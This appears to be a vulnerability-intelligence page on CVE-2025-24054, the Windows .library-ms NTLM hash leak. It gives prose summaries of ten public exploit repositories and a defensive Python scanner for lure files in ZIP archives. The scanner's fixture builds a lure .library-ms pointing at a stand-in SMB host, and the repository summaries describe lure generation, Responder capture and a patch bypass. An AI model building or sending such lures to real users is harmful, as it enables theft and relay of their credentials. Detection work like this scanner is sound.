Windows NTLM Hash Disclosure Spoofing via .library-ms
CVE-2025-24054 is a Microsoft Windows NTLM spoofing/hash disclosure vulnerability caused by external control of a file name or path in Windows NTLM. It is triggered by a specially crafted .library-ms file whose embedded location is an attacker-controlled UNC path: when Windows Explorer processes the file, it resolves that path and initiates SMB authentication to the attacker's server. Reported trigger conditions require only minimal interaction, such as single-clicking or right-clicking/inspecting the file, navigating to a folder containing it, or extracting an archive containing it. The result is disclosure of the victim's Net-NTLMv2 (NTLMv2-SSP) challenge-response over the network, which the attacker can crack offline or relay to services that do not enforce signing. Multiple reports describe the flaw as a variant of CVE-2024-43451, and active exploitation in the wild was observed in March 2025 within days of Microsoft's patch release.
Exploits
10 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (4 hidden).
This repository is a small, single-purpose proof-of-concept for CVE-2025-24054, a Windows .library-ms NTLM hash disclosure issue. It contains two files: a README describing the attack flow and usage, and a Python script (poc.py) that serves as the sole executable entry point. The script accepts an attacker IP address plus optional library/share names, builds a malicious .library-ms XML file containing a UNC path of the form \\ATTACKER_IP\SHARE, and packages that file into a ZIP archive for delivery. The exploit capability is limited but clear: it does not execute code on the victim, but it weaponizes Windows Explorer behavior so that when a victim extracts the ZIP, Explorer attempts to resolve the embedded remote library location over SMB. That outbound authentication leaks the victim's Net-NTLMv2 hash to the attacker-controlled SMB listener. The README explicitly suggests using Responder to capture the hash. Structurally, this is not part of a larger exploit framework and is not a detection script. It is a straightforward PoC generator with no built-in listener, cracking, relay, or post-exploitation logic. There are no hardcoded external IPs or domains; the primary fingerprintable target is the operator-supplied UNC path embedded into the generated XML. The repository's purpose is to help an operator create a malicious archive for lab validation of NTLM hash disclosure via crafted .library-ms files.
This repository is a small Metasploit auxiliary module project consisting of a license, a README, and one Ruby exploit module: ntlm_hash_leak.rb. Because it is a Metasploit module, the main analysis centers on that single Ruby file. The module uses Metasploit's FILEFORMAT mixin to generate a malicious ZIP archive rather than directly exploiting a remote service. Its purpose is to weaponize CVE-2025-24054, formerly referred to as CVE-2025-24071, by placing a crafted .library-ms file inside a ZIP. The embedded XML contains a search connector URL pointing to an attacker-controlled UNC path in the form \\ATTACKER_IP\SHARE_NAME. When a victim on Windows extracts or otherwise causes Explorer to process the .library-ms file, Windows attempts SMB authentication to that remote path, leaking the victim's NTLM hash. Core capabilities: the module registers configurable options for the output ZIP filename, attacker IP, .library-ms filename, and fake SMB share name; builds the malicious XML; inserts it into a ZIP archive; and writes the archive to Metasploit's local output directory. It does not itself capture hashes or deliver a shell. Instead, it prepares the lure file used to induce outbound SMB authentication. The README explains intended operational use with Metasploit's SMB capture module or external tools like Responder/Impacket. Repository structure is minimal and coherent: Readme.md documents the vulnerability, installation, and usage; ntlm_hash_leak.rb contains the exploit logic; LICENSE is standard MIT text. There is no detection-only behavior, no destructive logic, and no obvious signs of fakery. This is a real exploit module for file generation and credential leakage, best classified as a Metasploit weaponized auxiliary/file-format exploit with network impact via SMB authentication leakage.
Repository contains a minimal PoC for CVE-2025-24054 with two files: a tiny README and a single Python script (cve-2025-24054.py). The script is a generator that creates a crafted Windows “.library-ms” XML file and packages it into a ZIP (default: exploit.zip). The XML’s <url> element points to a user-specified UNC path (\\host\share) or, if given a bare host/IP, to \\<target>\shared. When the victim opens/imports the .library-ms on Windows 10/11, Windows may attempt to access the remote UNC location, potentially triggering an outbound NTLM authentication attempt and disclosing NTLM hashes/credentials to the remote SMB share. The code includes basic input validation (hostname/IP/UNC checks) and filename sanitization, supports interactive prompts, a --dry-run mode to print the XML without writing files, and a --force option to overwrite an existing ZIP. No additional payload execution is present beyond generating the coercive .library-ms artifact.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-24054 and CVE-2025-24071, targeting a vulnerability in Windows where opening a specially crafted .library-ms file can trigger an SMB authentication attempt to an attacker-controlled server, leaking the victim's NTLM hash. The repository contains three files: a Python script (exploit.py) that generates malicious .library-ms files pointing to arbitrary UNC paths, a sample .library-ms file (xd.library-ms) configured to point to \\10.10.14.22\share, and a README with detailed usage instructions. The exploit requires the victim to open or preview the malicious file on an unpatched Windows system. The attack vector is local (user interaction required), and the main fingerprintable endpoint is the UNC path embedded in the .library-ms file. The exploit is a PoC and does not include a payload for post-exploitation, but it enables credential theft via NTLM hash capture.
This repository provides a comprehensive proof-of-concept (PoC) toolkit for exploiting a chain of vulnerabilities in Windows Explorer's handling of certain file formats, resulting in zero-click NTLMv2-SSP hash disclosure. The repository contains two main exploit scripts: 1. 'ntml-disclosure-poc.py' (Python): Generates a malicious .searchConnector-ms (XML) file with an embedded UNC path pointing to an attacker-controlled SMB server, packages it in a ZIP archive, and is designed to exploit CVE-2025-24054. When a victim opens the ZIP in Windows Explorer, the embedded UNC path is automatically resolved, causing the system to attempt SMB authentication and leak the NTLM hash. 2. 'patch_bypass.ps1' (PowerShell): Generates a malicious .lnk (shortcut) file with its TargetPath set to a UNC path (again pointing to the attacker's SMB server), then packages it in a ZIP archive. This script targets the patched scenario (CVE-2025-50154 and CVE-2025-59214), bypassing Microsoft's initial fixes by leveraging Windows Explorer's icon and metadata fetching behavior. The LNK file can also be distributed standalone. Both scripts are operational exploits, not just detection tools. The README provides detailed technical background, usage instructions, and deployment scenarios, including social engineering vectors. The main attack vector is network-based, leveraging SMB authentication over UNC paths. The only fingerprintable endpoints are the attacker-controlled UNC paths (e.g., \\192.168.1.100\share or \\attacker-host\share\file), which must be accessible to the victim. The repository is well-structured, with clear separation between the Python and PowerShell implementations, and is intended for offensive security research and demonstration of the described vulnerabilities.
This repository contains a single Python script (PoC.py) that generates a malicious .library-ms file and zips it into 'exploit.zip'. The script takes two arguments: a base filename and an IP address. It creates an XML-based .library-ms file referencing a remote SMB share at the provided IP address. When a victim opens this file on a Windows system, their machine attempts to connect to the attacker's SMB server, potentially leaking NTLM credentials. The exploit demonstrates the classic NTLM credential-theft vector (hash capture, or relay if the attacker forwards the authentication) via a crafted Windows Library file. The repository is a proof-of-concept and does not include a server component to capture credentials; PoC.py is the only file present, and the exploit targets Windows systems by leveraging their handling of .library-ms files.
This repository provides a proof-of-concept (POC) exploit for CVE-2025-24054, a vulnerability in Microsoft Windows that allows NTLMv2 hash leakage via malicious .library-ms files. The repository contains two main Python scripts: - ELAINA-POC.py: A full-featured POC tool that can generate a malicious .library-ms file pointing to an attacker-controlled SMB share (using the 'create' command) and extract NTLM hashes from Responder logs (using the 'extract' command). It includes argument parsing and integrity checks for the ASCII logo. - CVE-2025-24054.py: A minimal script to extract NTLM hashes from a log file, using a regular expression. - Exploit.library-ms: A sample malicious .library-ms file with a placeholder for the attacker's SMB share. - README.md: Instructions in both Vietnamese and English on how to use the scripts to generate the malicious file, send it to a victim, and extract hashes from captured logs. The exploit works by generating a .library-ms file that, when opened by a Windows user, causes the system to attempt authentication to an attacker-controlled SMB server, leaking NTLMv2 hashes. The attacker can then extract these hashes from their SMB server logs using the provided scripts. The repository is structured for ease of use, with clear separation between payload generation and hash extraction functionality.
This repository is a proof-of-concept (PoC) exploit for CVE-2025-24054 and CVE-2025-24071, targeting a vulnerability in Windows where opening a specially crafted .library-ms file causes the system to initiate an SMB authentication to an attacker-controlled server, leaking the user's NTLMv2 hash. The repository contains three files: a Python script (exploit.py) that generates a malicious .library-ms file pointing to a configurable SMB server, a sample .library-ms file (xd.library-ms) with a hardcoded attacker IP, and a README with detailed usage instructions. The exploit requires the attacker to run an SMB server (such as Responder) and the victim to open or preview the malicious file. The main attack vector is local file execution leading to a network-based NTLM hash leak. The repository is structured as a PoC and does not include weaponized or automated exploitation features.
This repository contains a proof-of-concept exploit for CVE-2025-24054, a Windows NTLM credential theft vulnerability. The main file, CVE-2025-24054.py, is a Python script that generates a malicious .library-ms file. When this file is opened on a vulnerable Windows system, it causes the system to connect to an attacker-controlled SMB share (specified by the attacker IP and share name), resulting in the victim's NTLM hashes being sent to the attacker's server. The repository consists of the exploit script and a brief README describing the vulnerability. The exploit does not include a payload for post-exploitation, but demonstrates the credential theft vector via crafted file generation.
This repository contains a single Python script, 'create_library_ms.py', which generates a malicious Windows Library file (.library-ms). The script prompts the user for an attacker-controlled server address and creates a .library-ms file embedding a UNC path (e.g., \\attacker_ip\evilshare). When a victim opens this file in Windows Explorer, the system attempts to access the specified UNC path, causing Windows to authenticate to the attacker's SMB server and leak a Net-NTLMv2 response (or Net-NTLMv1, only where the client's LmCompatibilityLevel still permits it). The script is a proof-of-concept for credential capture attacks leveraging Windows' handling of library files and SMB authentication. The repository is structured as a single, self-contained exploit generator, and is intended for educational/lab use only. No hardcoded endpoints are present; the attacker provides the target server at runtime.
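The summary above and the repositories listed in this section all describe the same artifact: a .library-ms document whose search connector <url> is a UNC path, usually delivered inside a ZIP, which Explorer resolves on extraction. The following is an added example (not code from this page or from any of the repositories it lists) written from the defender's side: it builds in-memory samples in that structure, then scans a ZIP for .library-ms / .searchConnector-ms entries and reports every location that would make Explorer authenticate to a remote host. The sample archive, the file names, the TEST-NET address 203.0.113.5 and the knownfolder GUID are constructed for the example; the XML layout follows the public Windows Library Description schema, and the scanner only matches local element names so it works whether or not the document declares the namespace.

```python
import io
import re
import zipfile
from typing import List, Optional
import xml.etree.ElementTree as ET  # for untrusted input in production, prefer defusedxml

# Namespace of the Windows Library Description schema used by .library-ms files.
LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# Explorer resolves a remote <url> in both of these formats; compared case-insensitively.
LURE_EXTENSIONS = (".library-ms", ".searchconnector-ms")

# \\host\share, \\host@port\share (WebDAV) or a bare \\host: host group is what Explorer connects to.
UNC_RE = re.compile(r"^\\\\([^\\/?]+)(?:[\\/]|$)")
# file://host/share is resolved the same way.
FILE_URL_RE = re.compile(r"^file://([^/]+)/", re.IGNORECASE)


def build_library_ms(location: str) -> bytes:
    """Return a minimal .library-ms document whose single search connector points at `location`.

    Same structure the PoC generators emit; used here only to construct in-memory samples.
    The folderType GUID is the Documents template used in public samples (constructed value).
    """
    root = ET.Element("libraryDescription", xmlns=LIBRARY_NS)
    ET.SubElement(root, "name").text = "@shell32.dll,-34575"
    ET.SubElement(root, "version").text = "6"
    ET.SubElement(root, "isLibraryPinned").text = "true"
    ET.SubElement(root, "iconReference").text = "imageres.dll,-1003"
    tmpl = ET.SubElement(root, "templateInfo")
    ET.SubElement(tmpl, "folderType").text = "{7d49d726-3c21-4f05-99aa-fdc2c9474656}"
    lst = ET.SubElement(root, "searchConnectorDescriptionList")
    desc = ET.SubElement(lst, "searchConnectorDescription")
    ET.SubElement(desc, "isDefaultSaveLocation").text = "true"
    ET.SubElement(desc, "isSupported").text = "false"
    ET.SubElement(ET.SubElement(desc, "simpleLocation"), "url").text = location
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def remote_host(url: str) -> Optional[str]:
    """Return the host Explorer would authenticate to for `url`, or None if the location is local."""
    m = UNC_RE.match(url) or FILE_URL_RE.match(url)
    return m.group(1) if m else None


def scan_library_ms(entry_name: str, data: bytes) -> List[dict]:
    """Parse one .library-ms / .searchConnector-ms document and return every remote location in it."""
    hits: List[dict] = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return hits  # malformed XML: Explorer will not resolve it either; log it upstream
    for el in root.iter():
        # Compare local names so namespaced and namespace-less documents both match.
        if el.tag.rsplit("}", 1)[-1] != "url":
            continue
        url = (el.text or "").strip()
        host = remote_host(url)
        if host is not None:
            hits.append({"entry": entry_name, "url": url, "host": host})
    return hits


def scan_zip(zip_bytes: bytes) -> List[dict]:
    """Scan every lure-capable entry inside a ZIP, e.g. as received at a mail gateway or proxy."""
    hits: List[dict] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(LURE_EXTENSIONS):
                hits.extend(scan_library_ms(info.filename, zf.read(info)))
    return hits


def build_sample_zip() -> bytes:
    """Constructed sample archive: one lure pointing at a documentation IP, one benign library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice.library-ms", build_library_ms(r"\\203.0.113.5\share"))
        zf.writestr("Pictures.library-ms",
                    build_library_ms("knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}"))
        zf.writestr("readme.txt", "unrelated content")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_zip(build_sample_zip()):
        print(f"{hit['entry']}: remote location {hit['url']} -> would authenticate to {hit['host']}")
```

Two caveats when deploying this as a gateway check: legitimate corporate libraries can point at internal file servers, so compare the reported host against an allowlist of known servers rather than blocking every UNC, and this scanner covers only the .library-ms / .searchConnector-ms vector, not the .lnk TargetPath variant one of the repositories above describes.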
Affected products & vendors
Microsoft Windows (vendor-confirmed product mapping; the specific CPE configurations and affected version ranges are those listed in Microsoft's advisory for this CVE).
Recent activity
103 sources tracked across advisories, community write-ups, and news.
Referenced as included in CISA KEV and actively exploited in real-world campaigns, in the context of file-triggered NTLM hash leak attacks.
A similar NTLM-related vulnerability referenced as an example of real-world exploitation against government institutions.
A Windows NTLM hash disclosure vulnerability that can leak credentials upon file download; actively exploited and added to CISA KEV.
A vulnerability in Microsoft Windows NTLM protocol, abused in phishing attacks to deliver Warzone RAT.